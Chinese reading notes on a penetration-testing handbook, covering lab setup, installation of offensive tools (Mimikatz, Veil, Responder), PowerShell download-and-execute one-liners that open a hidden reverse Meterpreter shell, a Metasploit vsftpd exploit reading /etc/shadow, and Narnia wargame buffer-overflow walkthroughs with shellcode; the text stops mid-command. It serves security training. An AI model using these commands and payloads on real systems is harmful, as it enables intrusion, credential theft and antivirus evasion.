《黑客秘笈——渗透测试实用指南》读书笔记(1)

渗透学习

1.1搭建测试环境

Linux和 Windows兼备

 

1.2建立一个域

 

1.3建立其他服务器

Metasploitable2(一个优秀的 Ubuntu Linux虚拟机)

下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2

 

OWASPBWA(漏洞网站多)

http://sourceforge .net/projects/owaspbwa/files/

 

1.4安装测试环境

1.4.1安装虚拟平台

  VirtualBox(http://www.virtualbox.org)

   VMWarePlayer(https://my.vmware.com/web/vmware/downloads)

在配置主机后,对干净状态和配置状态的虚拟机进行了快照。后面的测试中需要做到就是恢复虚拟机到基础镜像,对工具进行升级和打补丁或者添加其他需要的工具。

 

1.5硬件

测试笔记本

1、8G以上笔记本两个

2、500G硬盘(最好固态)

3、Intel酷睿i7四核处理器

密码破解桌面

机箱:海盗船复仇C70。

 

显卡:SAPPHIRE 100360SR Radeon R9 295x2 8GBGDDR5。

 

硬盘:三星840 EVO MZ-7TE500BW 2.5" 500GBSATA III TLC Internal固态盘。

 

电源:银欣ST1500 1500W ATX。

 

内存:海盗船复仇16GB(2×8GB)240针脚DDR3 SDRAM DDR3 1600。

 

CPU:酷睿i7 4790K 4.0G。

 

主板:华硕MAXIMUS VII FORMULA。

 

处理器风扇:酷冷至尊Hyper 212 EV。

 

 

 

1.6开发软件

商业软件

Burp Suite Pro

  •  Web渗透测试工具集
  • 下载网址:http://portswigger.net/burp/proxy.html。强烈推荐购买专业版本,售价299美元,绝对物有所值。

 

Canvas

Cobalt Strike

Core Impact

Nessus

Nexpose

2.Kali Linux(https://www.kali.org/)

1.5.5 搭建Kali Linux

查看http://www.thehackerplaybook.com网页的更新。

所有的配置和软件部分放到了Github网址(http://www.github.com/cheetz/thp2)。通过复制和粘贴脚本,方便渗透测试工作,不需要手动输入每一个命令。

可以通过地址http://www.kali.org/downloads/下载Kali Linux发行版。强烈推荐下载VMware镜像(https://www.offensive-security.com/kali-linux-vmware-arm-image-download)和Virtual Player/VirtualBox。记住镜像文件采用gz压缩和tar存档格式,首先提取压缩和存档文件,然后加载vmx文件。

1.Kali虚拟机启动和运行

  • 使用用户名root和默认密码toor登录
  • 打开一个终端
  • 修改密码
    • passwd
  • 更新镜像
    • apt-get update
    • apt-get dist-upgrade
  • 设置Metasploit数据库
    • service postgresql start
  • 让postgresql数据库在启动时加载
    • update-rc.dpostgresql enable
  • 启动和停止Metasploit服务(设置数据库.yml文件)
    • service metasploit start
    • service metasploit stop
  • 安装gedit软件
    • apt-get install gedit
  • 修改主机名(很多网络管理员在DHCP的日志中查询到多台命名为Kali的主机,最好遵循渗透测试公司的主机命名规则)
    • gedit /etc/hostname
      更改主机名(替换kali)并保存
    • gedit /etc/hosts
      更改主机名(替换kali)并保存
    • reboot
  • *Metasploit可选项——启动日志记录
    • 作为可选项,如果启用日志就会变得很大,但是通过Metasploit命令行接口,可以记录运行的每一条命令和结果。如果客户需要日志记录或者开展批量攻击和查询,这将变得非常有用。*如果是干净的镜像,首先输入msfconsole,在配置logging命令创建.msf4文件夹之前退出。
    • 在命令行中输入:
      echo"spool /root/msf_console.log" > /root/.msf4/msfconsole.rc
    • 日志存储在/root/msf_console.log。

 

3.Back Box(http://www.backbox.org/

 

1.7 建立平台

探测扫描工具

 

安装Firefox插件

  • Web开发人员插件:https://addons.mozilla.org/en-US/firefox/addon/webdeveloper/
  • Tamper Data:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  • Foxy Proxy:https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  • User Agent Switcher:https://addons.mozilla.org/en-US/firefox/addon/user-agentswitcher/

 

Discover

Discover Scripts

  • 定制的bash脚本,自动化处理各种渗透任务
  • git clone https://github.com/leebaird/discover.git/opt/discover
  • cd /opt/discover && ./setup.sh

 

EyeWitness

  • EyeWitness工具实现网站截图,搜集服务器报头信息和判断网站是否采用默认口令
  • git clone https://github.com/ChrisTruncer/EyeWitness.git/opt/EyeWitness

 

HTTPScreenShot

  • HTTPScreenShot工具实现屏幕截图和大量网站网页的抓取
  • pip install selenium
  • git clone https://github.com/breenmachine/httpscreenshot.git/opt/ httpscreenshot
  • cd /opt/httpscreenshot
  • chmod +x install-dependencies.sh && ./install-dependencies.sh
  • HTTPScreenShot仅仅默认工作在64位Kali操作系统,如果运行32位PAE操作系统,按照下面步骤安装phatomjs:
    • wget https://bitbucket.org/ariya/phantomjs/downloads/ phantomjs-1.9.8-linuxi686.tar.bz2
    • bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2
    • tar xvf phantomjs-1.9.8-linux-i686.tar
    • cp phantomjs-1.9.8-linux-i686/bin/phantomjs /usr/bin/

 

WMAP

 

SpiderFoot

  • 开源的指纹检测工具
  • mkdir /opt/spiderfoot/ && cd /opt/spiderfoot
  • wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz/download
  • tar xzvf download
  • pip install lxml
  • pip install netaddr
  • pip install M2Crypto
  • pip install cherrypy
  • pip install mako

 

Masscan

  • 这是最快速的互联网端口扫描工具,能够在6分钟扫描整个互联网
  • apt-get install gitgcc make libpcap-dev
  • git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan
  • cd /opt/masscan
  • make
  • make install

 

Gitrob

  • 一种针对GitHub组织的探测工具
  • git clone https://github.com/michenriksen/gitrob.git /opt/gitrob
  • gem install bundler
  • service postgresql start
  • supostgres
  • createuser -s gitrob --pwprompt
  • createdb -O gitrobgitrob
  • exit
  • cd /opt/gitrob/bin
  • gem install gitrob

 

CMSmap

  • CMSmap是基于Python开发的开源内容管理系统扫描工具,实现对安全漏洞自动扫描
  • git clone https://github.com/Dionach/CMSmap /opt/CMSmap

 

Recon-ng

  • 一个功能齐全的网站探测框架,使用Python编写
  • git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng

 

SPARTA

  • 从NTDSXtract中提取用户易于理解的哈希值
  • wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O/opt/NTDSXtract/dshashes.py

 

WPScan

  • WordPress漏洞扫描工具和暴力破解工具
  • git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan
  • cd /opt/wpscan&& ./wpscan.rb --update

 

Password Lists

 

漏洞利用工具

 

 

Fuzzing Lists(SecLists)

  • 用于配置Burp渗透测试参数
  • git clone https://github.com/danielmiessler/SecLists.git/ opt/SecLists

 

Burp Suite Pro

  • Web渗透测试工具集
  • 下载网址:http://portswigger.net/burp/proxy.html。强烈推荐购买专业版本,售价299美元,绝对物有所值。

 

ZAP Proxy Pro

  • OWASP ZAP:一个使用方便的集成渗透测试工具,用于挖掘网站应用程序漏洞
  • 下载网址:https://code.google.com/p/zaproxy/wiki/Downloads?tm=2
  • *Kali Linux默认安装(owasp-zap)

 

NoSQLMap

  • 用于MongoDB数据库和网站应用程序的自动化渗透测试工具集
  • git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap

 

SQLMap

  • SQL注入工具
  • git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap

 

SQLNinja

 

BeEF Exploitation Framework

  • 一个跨站脚本攻击框架
  • cd/opt/
  • wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef
  • chmod +x install-beef
  • ./install-beef

 

Responder

  • 一个LLMNR、NBT-NS和MDNS协议攻击工具,包括HTTP/SMB/MSSQL/FTP/LDAP诱骗认证方法,支持NTLMv1/NTLMv2/LMv2,扩展的NTLMSSP和基本HTTP认证协议。Responder用于获取NTLM挑战/应答哈希值。
  • git clone https://github.com/SpiderLabs/Responder.git /opt/Responder

 

Printer Exploits

  • 包括大量常用的打印机漏洞利用工具

·       git clone https://github.com/MooseDojo/praedasploit/opt/praedasploit

Veil

Veil-Framework

  • 红队工具集用于规避杀毒软件检测。目前包括Veil-Evasion用于生成规避杀毒软件净荷,Veil-Catapult投送净荷到目标,Veil-PowerView获取Windows域网络拓扑信息。Veil框架也可用于创建基于Python脚本的Meterpreter可执行程序
  • git clone https://github.com/Veil-Framework/Veil /opt/Veil
  • cd /opt/Veil/ && ./Install.sh -c

 

WIFIPhisher

  • WiFi网络自动化钓鱼攻击
  • git clone https://github.com/sophron/wifiphisher.git/opt/wifiphisher

 

Wifite

  • WiFi网络攻击工具
  • git clone https://github.com/derv82/wifite/opt/wifite

 

SET

  • 社会工程工具集(Social Engineering Toolkit,SET)主要用于社会工程攻击
  • git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/
  • cd /opt/set && ./setup.py install

 

后渗透测试

 

 

本书中的自定义脚本

  • git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P
  • git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One
  • git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup
  • git clone https://github.com/cheetz/icmpshock /opt/icmpshock
  • git clone https://github.com/cheetz/brutescrape /opt/brutescrape
  • git clone https://www.github.com/cheetz/reddit_xss /opt/reddit_xss

 

SMBexec

  • 使用samba工具的一种快速psexec类型攻击

·       git clone https://github.com/pentestgeek/smbexec.git/opt/smbexec

  • cd /opt/smbexec&& ./install.sh
  • 选择1 - Debian/Ubuntu and derivatives
  • 选择所有默认值Select all defaults
  • ./install.sh
  • 选择4编译smbexec二进制文件
  • 编译完成后选择5退出

 

Veil

 

WCE

  • Windows凭证编辑器(Windows Credential Editor,WCE),用于从内存中读取密码
  • 下载地址为http://www.ampliasecurity.com/research/windows-credentials-editor/,将其存储在/opt/。例如:
    • wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
    • mkdir/opt/wce&& unzip wce_v1* -d /opt/wce&&rm wce_v1*.zip

 

Mimikatz

  • 用于从内存获取明文密码、金票据和万能密钥等
  • 从https://github.com/gentilkiwi/mimikatz/releases/latest获取最新版本
    • cd /opt/ &&wget http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
    • unzip-d ./mimikatz mimikatz_trunk.zip

 

PowerSploit

  • PowerShell脚本用户后渗透测试
  • git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit
  • cd/opt/PowerSploit && wget
  • https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && wget
  • https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py

 

Nishang

  • PowerShell漏洞利用和后渗透测试脚本汇总
  • git clone https://github.com/samratashok/nishang/opt/nishang

 

后门制造工厂

  • 对PE、ELF、Mach-O等二进制文件注入shellcode
  • git clone https://github.com/secretsquirrel/the-backdoor-factory/opt/the-backdoorfactory
  • cd the-backdoor-factory
  • ./install.sh

DSHashes

  • 从NTDSXtract中提取用户易于理解的哈希值
  • wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O/opt/NTDSXtract/dshashes.py

 

Net-Creds

Net-Creds网络分析

  • 分析PCAP文件,获取用户名/密码
  • git clone https://github.com/DanMcInerney/net-creds.git/ opt/net-creds

 

代码副本

  • 本书使用了PowerSploit和Powertools的代码副本,记住要从原始的代码库中复制一份
  • git clone https://github.com/cheetz/PowerSploit/opt/HP_PowerSploit
  • git clone https://github.com/cheetz/PowerTools/opt/HP_PowerTools
  • git clone https://github.com/cheetz/nishang/opt/nishang

 

Phishing(可选)

  • Phishing-Frenzy
    • git clone https://github.com/pentestgeek/phishing-frenzy.git/var/www/phishing-frenzy
  • 其他自定义列表
    • git clone https://github.com/macubergeek/gitlist.git /opt/gitlist

 

 

1.8 设置Windows环境

搭建Windows通用测试平台作为KaliLinux平台的备份。记住一定要修改主机名,如果不使用NetBios,就禁用NetBios功能,要做的最后一件事是在评估过程中获取控制权。

设置Windows通常安装以下软件。

  • HxD:下载地址为http://mh-nexus.de/en/hxd/
  • Evade:下载地址为https://www.securepla.net/antivirus-now-you-see-me-now-you-dont
  • Hyperion:下载地址为http://www.nullsecurity.net/tools/binary.html
    • 下载并安装Windows编译器,地址为http://sourceforge.net/projects/mingw/
    • 在Hyperion目录下运行make命令,就可以得到二进制文件。
  • 下载并安装Metasploit,地址为http://www.Metasploit.com/
  • 下载并安装Nessus或者Nexpose
    • 如果打算购买商业软件,可以考虑购买Nessus,因为它更便宜,但是两个软件都能发挥作用。
  • 下载并安装nmap,地址为http://nmap.org/download.html
  • 下载并安装oclHashcat,地址为http://hashcat.net/oclhashcat/
  • 下载并安装Cain and Abel,地址为http://www.oxid.it/cain.html
  • 下载Burp Proxy Pro,地址为http://portswigger.net/burp/download.html
  • 下载并解压Nishang,地址为https://github.com/samratashok/nishang
  • 下载并安装PowerSploit,地址为https://github.com/mattifestation/PowerSploit/
  • 安装Firefox插件
    • Web开发人员插件:https://addons.mozilla.org/en-US/firefox/addon/webdeveloper/
    • Tamper Data:https://addons.mozilla.org/en-US/firefox/ addon/tamper-data/
    • Foxy Proxy:https://addons.mozilla.org/en-US/firefox/ addon/foxyproxystandard/
    • User Agent Switcher:https://addons.mozilla.org/en-US/firefox/addon/useragent-switcher/

1.9 启动PowerShell

PowerShell功能,请观看这个视频:

  • PowerShell脚本安全介绍:http://bit.ly/1MCb7EJ

PowerShell对于渗透测试人员有以下益处:

  • Windows 7以上操作系统默认安装;
  • PowerShell脚本可以运行在内存中;
  • 几乎不会触发杀毒软件;
  • 可以调用.NET类;
  • 利用用户口令(查询活动目录);
  • 可以用来管理活动目录;
  • 远程执行PowerShell脚本;
  • 使得Windows脚本攻击更加容易;
  • 目前很多工具是基于PowerShell开发的,掌握这些工具帮助您成为能力出众、效率较高的渗透测试人员。

您可以通过Windows终端提示符输入“PowerShell”,进入PowerShell命令行,输入“help”命令显示帮助菜单。下面是本书用到的基本参数和基本设置。

  • -Exec Bypass:绕过执行安全保护。
    • 这个参数非常重要!默认情况下,PowerShell的安全策略不允许运行命令和文件。通过设置这个参数,可以绕过任何一个安全保护规则。在本书中,每一次运行PowerShell脚本时均使用这个参数。
  • -NonI:非交互模式,PowerShell不提供用户交互式提示符。
  • -NoProfile(或者 –NoP):PowerShell控制台不加载当前用户的配置。
  • -noexit:执行后不退出shell。这对于脚本,例如键盘记录,非常重要,因此这些脚本可以继续执行。
  • -W Hidden:设置会话的窗口风格,将命令窗口保持隐藏。
  • 32位或64位PowerShell。
    • 这非常重要。一些脚本仅仅能够运行在它们指定的平台。因此,如果是在64位平台,需要执行64位PowerShell脚本来运行命令。
    • 32位PowerShell脚本执行:
      powershell.exe -NoP -NonI -W Hidden -Exec Bypass
    • 64位PowerShell脚本执行:
      %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass

为了更好了解PowerShell的使用方法,下面介绍一些常用的执行命令(这些命令将在本书中使用)。

第一个命令是从网站服务器下载PowerShell脚本,并执行脚本。在很多情况下,通过命令行,在被攻击对象主机上下载MeterpreterPowerShell脚本:

  • Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-ObjectNet.WebClient). DownloadString('[PowerShell URL]'); [Parameters]

例如,如果想在目标上执行Meterpreter Shell,需要下载这个脚本:

  • https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

我们同样需要知道使用什么参数。最简单的找到参数的方式是阅读PowerShell脚本源代码,获取和浏览Invoke--Shellcode.ps1文件。查看Mattifestationbianxie开发的Invoke--Shellcode.ps1文件,可以通过这个例子,了解如何调用反向https Meterpreter shell(见图1.1)。

最终的PowerShell命令看起来如下所示。

  • Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient). DownloadString('https://raw.githubusercontent.com/cheetz/ PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https- Lhost 192.168.30.129 -Lport 80

图1.1 Invoke--Shellcode.ps1

可以看出,PowerShell使用非常简单,而且功能超级强大。下面了解更多的例子。

例如,下载同一个文件到目标上。您不需要访问网页,就可以自动下载和执行文件。在本地执行文件:

  • powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& { Import-Module [Path and File of PowerShell]; [Parameters] }"

最后,在本书中我通常使用base64编码PowerShell脚本,目的是混淆和压缩代码。运行和编码PowerShell脚本的命令如下:

  • powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]

希望上述的例子能帮助您在渗透测试中娴熟地使用PowerShell。

1.10 Easy-P

因为本书大量应用PowerShell脚本实施攻击,所以我创建了一个小的脚本,用于在渗透测试过程中获取PowerShell脚本。Easy-P包括我常用的一些PowerShell工具,并且具有编码脚本的功能。

对于每个命令,Easy-P提供多种方式运行代码,包括本地和远端。注意所有的远程PowerShell脚本指向我的代码或者其他人代码的复制版本。在这里我要强调一点,在后面的章节中还会提到多次:记住要从源代码中复制自己的一个拷贝,这样您就不会盲目地运行其他人的代码。现在如果一些人恶意地随意篡改PowerShell脚本,您永远不会知道发生了什么。没有做什么或者更坏的情况是,您的shell将转向其他人指定的地址。下面了解一下Easy-P的功能(见图1.2),使渗透测试工作变得更加简单。

  • cd /opt/Easy-P
  • python ./easy-p.py

图1.2 THP Easy-P

我在本书中最经常做的一件事就是使用PowerShell Meterpreter脚本。当执行Easy-P脚本时,输入选项4。设置本地主机IP和Meterpreter脚本回连的端口。完成设置后,就能看到如图1.3所示的输出。

得到4个不同类型的输出。

  • 从因特网下载和执行:从网站下载一个PowerShell脚本,然后执行脚本。虽然仅获得简单的shell,并且不能下载文件,但是也很棒了。
  • 从脚本的一个本地副本运行:如果您已经将一个PowerShell文件下载到系统中,运行命令导入PowerShell脚本,然后执行脚本。
  • Base64编码版本下载和执行:如果由于某个原因想混淆编码脚本,或者遇到字符限制,您可以使用base64编码代码,然后执行命令。
  • 资源文件:最后输出的是关联的资源文件。Metasploit资源文件是一种快捷方式,自动为MeterpreterPowerShell建立监听程序。复制资源脚本并将它存成文件:/opt/listener.rc。

图1.3 Easy-P输出示例

所有的脚本已经配置成绕过执行策略,保持隐藏,以及非交互运行。看一下Easy-P其他菜单选项,还包括权限提升、横向渗透、键盘记录、PowerShellMeterpreter和修改用户执行策略等功能。请随意复制我的代码,然后修改、增加所需要的PowerShell代码。

 

1.11特别知识点

1.11.1 Metasploitable 2

在开始前,需要下载安装Metasploitable 2环境的VMWare镜像。

下载地址为http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

下载Metasploitable 2软件后,解压软件,并在VMware Player或者Virtual Box虚拟机中打开软件,输入用户名msfadmin和密码msfadmin登录软件。现在运行VM镜像文件。

试验环境

开始运行Nmap、Masscan或者其他漏洞工具,测试存在漏洞的虚拟机。一旦发现系统漏洞,就运行漏洞利用程序获取一个shell。举个例子,我们发现并且将利用vsftpd存在的缺陷。因此,可以搜索漏洞(搜索vsftpd,见图1.4)或者直接运行漏洞利用程序。

  • msfconsole
  • use exploit/unix/ftp/vsftpd_234_backdoor(选择漏洞)
  • show options(显示配置选项)
  • set RHOST [IP](设置Metasploitable 2 IP)
  • exploit(运行漏洞)

图1.4 Metasploit例子

成功利用这个漏洞,读取存储的密码:cat /etc/shadow。为了深入研究Metasploitable 2,请阅读Rapid7指南,地址为https://community.rapid7.com/docs/DOC-1875。

这个虚拟机包括很多不同类型漏洞。您要花费时间学习如何有效使用Metasploit和Meterpreter。如果想深入了解Metasploit,推荐访问http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X。

1.11.2二进制利用

请阅读下面的书籍:The Shellcoders Handbook(http://amzn.to/1E3k89R)或者Hacking: The Art of Exploitation,2nd Edition(http://amzn.to/1z8oThD)。然而,这并不意味着您不需要理解缓冲区溢出和基本漏洞技术。既然所有的渗透测试人员都需要能够编写脚本代码,那么他们也需要能理解漏洞利用代码。比如可能在Metasploit找到一个模块,它不能正常工作,需要较小的调整,或者需要验证从互联网下载的漏洞利用代码。

已经有大量不同类型网站,帮助开始学习二进制漏洞基础知识。一个非常好的学习网站是Over the Wire(http://overthewire.org/wargames/narnia/ )。Over the Wire网站是一个在线夺旗挑战站点,专注于从二进制攻击到网站攻击所有方面的知识。在本章,仅仅介绍二进制漏洞利用。如果您之前没有了解相关的背景知识,我建议用几个周末的时间深入研究这个网站。为了顺利进入情况,我先和您一起回答几个试题,然而后面的挑战试题需要您自己完成。

在开始前,需要学习以下基础知识:

  • 基本的汇编语言和理解寄存器的使用;
  • GDB基础知识(GNU调试器);
  • 理解不同类型的内存段(栈、堆、数据、BSS和代码段);
  • Shellcode基本概念。

下面这些资源可能会对学习有所帮助:

  • http://opensecuritytraining.info/IntroX86.html
  • http://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflow/
  • https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stackbased-overflows/
  • http://www.lethalsecurity.com/wiki
  • http://opensecuritytraining.info/Exploits1.html
  • https://exploit-exercises.com/protostar/

 

1.11.3Narnia设置(http://overthewire.org/wargames/narnia/)

(1)阶段1

Narnia正确配置后,SSH登录到它们的服务器,所有的挑战位于/narnia/目录下。下面详细了解前三个例子。在Kali的终端提示符下或者在Windows下使用类似于Putty(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)的软件。

每一阶段挑战都提供C语言代码和二进制可执行文件。对于挑战0,具有访问narnia0和narnia0.c的权限。现在看一下C代码。

  • cat narnia0.c

快速浏览代码(见图1.5)后,看到变量“val”被赋值十六进制“AAAA”。其次,可以看到,程序接受输入的缓冲区长度为20字节。在之后的一些行,scanf()函数允许最多输入24字节。这是非常简单的缓冲区溢出例子。现在运行可执行文件,作为测试,输入20个A和4个B(因为我们知道十六进制值A=41和B=42),在命令提示符下,显示的字符如下:

  • narnia0@melinda:/narnia$ ./narnia0
  • 修改val的值0x41414141 -> 0xdeadbeef!
  • 这个是您的机会:AAAAAAAAAAAAAAAAAAAABBBB
  • 缓冲区:AAAAAAAAAAAAAAAAAAAABBBB
  • val:0x42424242
  • 退出!!!!

图1.5 narnia0代码

太棒了!因为val十六进制值是0x42424242(42对应ASCII字母B),可以修改内存中val的值,之前这个值是0x41414141。现在需要做的就是修改内存值为0xdeadbeef。这里提醒一下,所有写到堆栈中的值必须是小端格式(http://en.wikipedia.org/wiki/Endianness ),这意味着0xdeadbeef最后的字节必须是第一个压到栈中的字节,从而覆盖val的值。目标机器栈机制是先进后出(FILO),或者说是后进先出(LIFO)的架构。因此,为了设置0xdeadbeef值,以“\xef\xbe\xad\xde”顺序写入。最简单的方式是使用Python语言生成所需的数值,并将其作为narnia0例子的输入值。请看下面的操作过程:

  • narnia0@melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
  • 修正val变量值从0x41414141 -> 0xdeadbeef!
  • 这是机会:buf: AAAAAAAAAAAAAAAAAAAA?
  • val: 0xdeadbeef

太棒了!现在已经将deadbeef值写入“val”变量中。那么如何运行shell命令呢?再查看C代码,可以看到,如果匹配deadbeef,/bin/sh将被调用。因此运行Python代码,并读取位于/etc/narnia_pass/narnia1的密钥:

  • narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0
  • 修正val变量值从0x41414141到0xdeadbeef!
  • 这是机会:缓冲区:AAAAAAAAAAAAAAAAAAAA?
  • val: 0xdeadbeef
  • [阶段1的答案]

如果成功了,就通过阶段1,并获得narnia1账户的口令(见图1.6)。现在需要注销账户并使用narnia1账户重新登录。

图1.6 narnia0漏洞利用

(2)阶段2

在完成每一个阶段后,都可以获得下一个账户的口令。使用刚刚获得narnia1账户登录阶段2:

浏览这段C代码(见图1.7),很快可以看到一些操作。

  • int (*ret)():是一个指向ret的指针,用于获取指针对应的数值。
  • getenv:引入一个环境变量EGG并将值存入变量ret中。
  • 调用ret()。

图1.7 narnia1代码

如果将shellcode存储在环境变量ECG中,那么无论shellcode是什么内容,它都将被执行。简单的做法是设置shellcode代码为/bin/sh,并将其赋值给ECG的环境  变量。

  • 在这个例子中,将恶意代码设置为/bin/sh:http://shell-storm.org/shellcode/files/shellcode-811.php
  • export EGG=‘python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\ x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'`
  • ./narnia1
  • cat /etc/narnia_pass/narnia2

已经有了narnia2账户的密码(见图1.8),现在可以进入阶段3。

(3)阶段3

登录阶段3:

图1.8 narnia1漏洞利用

浏览C代码,查看下面的代码:

  • char buf[128];
  • if(argc == 1){
  •     printf("Usage: %s argument\n",argv[0]);
  •     exit(1);
  • }
  • strcpy(buf,argv[1]);
  • printf("%s",buf);

通过浏览代码可以看到,通过命令输入一个参数,并将它复制到缓冲区。字符串的缓冲区大小是128个字节,因此我们发送200个字符:

  • narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "A" * 200''
  • 段错误

仅仅是验证,通过发送200个字符,造成程序出现段错误。需要判断发送多少字节,可以覆盖EIP寄存器。可以使用Metasploit的pattern_create.rb模块实现这个目的。这个模块生成一个特别字符串,在下面的例子中,创建200个字节的字符串。由于生成的字符串不会重复,因此能够精确识别出程序在什么位置覆盖EIP。

  • /usr/share/metasploit-framework/tools/pattern_create.rb 200
  • Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
    b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
    d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9A
    f0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

现在运行程序narnia2,输入新生成的特殊字符串,观察在造成段错误之前,输入了多少个字节。为了获得段错误的精确结果,使用了调试器。默认情况下,Linux操作系统内嵌gdb调试器。尽管gdb调试器不是最容易使用的调试器,但是它的功能非常强大。

  • gdb ./narnia2 -q
  • run 'python -c' 'print"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
    b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
    d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
    f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"''

查询结果如图1.9所示。

图1.9 narnia2漏洞利用

  • 程序接收SIGSEGV信号,段错误。
  • 0x37654136 in ?? ()

命令输出结果是0x37654136。通过查看初始的字符串来查找精确的值。为了能够计算出造成段错误的准确字节数,使用Metasploit的pattern_offset.rb脚本:

  • /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
  • [*] Exact match at offset 140

这表明在140个字节后可以控制EIP。为了证明这个结果,运行narnia2程序,输入140个字节,使用另外的4个字节覆盖EIP。通过使用调试器来观察内存中的变化。

输出结果如下所示。

  • cd /narnia
  • gdb ./narnia2 -q
  • (gdb) run 'python -c 'print "A" * 140 + "B" * 4'`
    • Starting program: /games/narnia/narnia2 'python -c 'print "A" * 140 + "B" * 4'`
    • Program received signal SIGSEGV,Segmentation fault.
    • 0x42424242 in ?? ()
  • (gdb) info registers
    • eax     0x0 0
    • ecx     0x0 0
    • edx     0xf7fcb898   -134432616
    • ebx     0xf7fca000   -134438912
    • esp     0xffffd640    0xffffd640
    • ebp     0x41414141   0x41414141
    • esi     0x0 0
    • edi     0x0 0
    • eip     0x42424242   0x42424242

使用“B”字符(或者十六进制0x42)覆盖EIP,EIP是处理器下一步执行代码的指针。如果将EIP指向一段shellcode区域,就可以控制系统。那么到哪儿可以找到shellcode呢?可以定制shellcode或者从下面网址下载shellcode:http://shell-storm.org/shellcode/。在这个例子中,使用Linux/x86 - execve(/bin/sh),长度28个字节。shellcode长度是28个字节,净荷需要144个字节长度。将A替换为NOP或者0x90,这意味着程序跳到NOP时将继续执行,直到开始运行可执行代码。在使用空指令测试后,我创建了下列代码:

  • cd /narnia
  • gdb ./narnia2 -q
  • run 'python -c 'print "\x90" * 50+
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
    x53\x89\xe1\xb0\x0b\xcd\x80" + "\x90" * 67 + "BBBB"'
    • 开始运行程序:/games/narnia/narnia2 `python -c 'print "\x90" *50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\ x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\ x90" * 67 + "BBBB"'
    • 程序接收SIGSEGV信号,段错误。
    • 0x42424242 in ?? ()
  • (gdb) info registers eip
    • eip 0x42424242 0x42424242

通过shellcode和NOP成功控制EIP的值。现在在NOP前放置shellcode,从而获得一个/bin/sh shell。为了能够看到出现段错误后内存中的内容,输入:

  • x/250x $esp

滚动浏览,可以看到以下内容(见图1.10)。

图1.10 NOP Sled

可以看到初始的NOP (x90),后面是shellcode,然后是多个NOP,最后是BBBB。修改BBBB值,使其指向NOP,从而执行shellcode代码。一个简单的地址是0xffffd850栈地址,指向NOP中的第一个字符。开始进行测试,记住不要忘记系统是小段模式。

  • (gdb) run 'python -c 'print "\x90" * 50 +"\x31\xc0\x50\x68\x2f\x2f
    \x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b
    \xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"''
    • 开始运行程序:/games/narnia/narnia2 "python -c 'print "\x90" * 50
      +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
